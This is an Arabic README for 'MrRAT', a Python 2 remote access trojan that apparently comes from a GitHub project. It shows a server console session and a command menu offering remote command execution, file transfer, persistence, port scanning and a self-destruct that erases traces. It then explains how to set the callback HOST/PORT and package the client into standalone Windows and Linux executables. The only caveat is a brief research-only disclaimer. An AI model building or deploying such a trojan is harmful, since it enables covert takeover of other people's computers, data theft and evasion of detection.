
🐭 هذا حصان طروادة للوصول عن بُعد (RAT) مكتوب بلغة Python 2.x ويعمل عبر منصات متعددة
هذه أداة وصول عن بُعد (RAT) مكتوبة بلغة Python 2.x وتعمل على أنظمة متعددة، صُمم MrRAT للحفاظ على تصميم نظيف وحتى الميزات الكاملة لـ Python RAT. يُعد هذا المشروع حاليًا قيد التطوير ويتم العمل عليه بنشاط.
إخلاء مسؤولية: هذه الأداة مخصصة لأغراض البحث فقط، ويجب استخدامها فقط على الأنظمة المصرح بها. الوصول إلى نظام كمبيوتر أو شبكة دون إذن أو تفويض صريح يُعد أمرًا غير قانوني.
$ python MrRAT_server.py --port 1337
/$$ /$$ /$$$$$$$ /$$$$$$ /$$$$$$$$
| $$$ /$$$ | $$__ $$ /$$__ $$|__ $$__/
| $$$$ /$$$$ /$$$$$$ | $$ \ $$| $$ \ $$ | $$
| $$ $$/$$ $$ /$$__ $$| $$$$$$$/| $$$$$$$$ | $$
| $$ $$$| $$| $$ \__/| $$__ $$| $$__ $$ | $$
| $$\ $ | $$| $$ | $$ \ $$| $$ | $$ | $$
| $$ \/ | $$| $$ | $$ | $$| $$ | $$ | $$
|__/ |__/|__/ |__/ |__/|__/ |__/ |__/
, .
(\,;,/)
(o o)\//,
\ / \,
`+'( ( \ )
// \ |_./
'~' '~----'
https://github.com/user696/MrRAT
MrRAT server listening for connections on port 1337.
[?] MrRAT> help
client <id> - Connect to a client.
clients - List connected clients.
download <files> - Download file(s).
execute <command> - Execute a command on the target.
help - Show this help menu.
kill - Kill the client connection.
persistence - Apply persistence mechanism.
quit - Exit the server and end all client connections.
scan <ip> - Scan top 25 ports on a single host.
selfdestruct - Remove all traces of the RAT from the target system.
survey - Run a system survey.
unzip <file> - Unzip a file.
upload <files> - Upload files(s).
wget <url> - Download a file from the web.
[?] MrRAT> clients
ID - Client Address
1 - 127.0.0.1
[?] MrRAT> client 1
[1] MrRAT> execute uname -a
Linux sandbox3 4.8.13-1-ARCH #1 SMP PREEMPT Fri Dec 9 07:24:34 CET 2016 x86_64 GNU/Linux
ضع في اعتبارك أنه قبل البناء، ستحتاج على الأرجح إلى تعديل كلا المتغيرين HOST و PORT الموجودين في أعلى ملف MrRAT_client.py بما يناسب احتياجاتك.
على Linux ستحتاج إلى Python 2.x و PyInstaller و pycrypto. ثم شغّل شيئًا مثل pyinstaller2 --onefile MrRAT_client.py ويجب أن يُنشئ مجلد dist/ يحتوي على ملف تنفيذي مستقل بصيغة ELF.
على Windows ستحتاج إلى Python 2.x و PyInstaller و pycrypto و pywin32 و pefile. ثم شغّل شيئًا مثل C:\path\to\PyInstaller-3.2\PyInstaller-3.2\pyinstaller.py --onefile MrRAT_client.py ويجب أن يُنشئ مجلد dist/ يحتوي على ملف تنفيذي مستقل بصيغة PE (ملف تنفيذي محمول).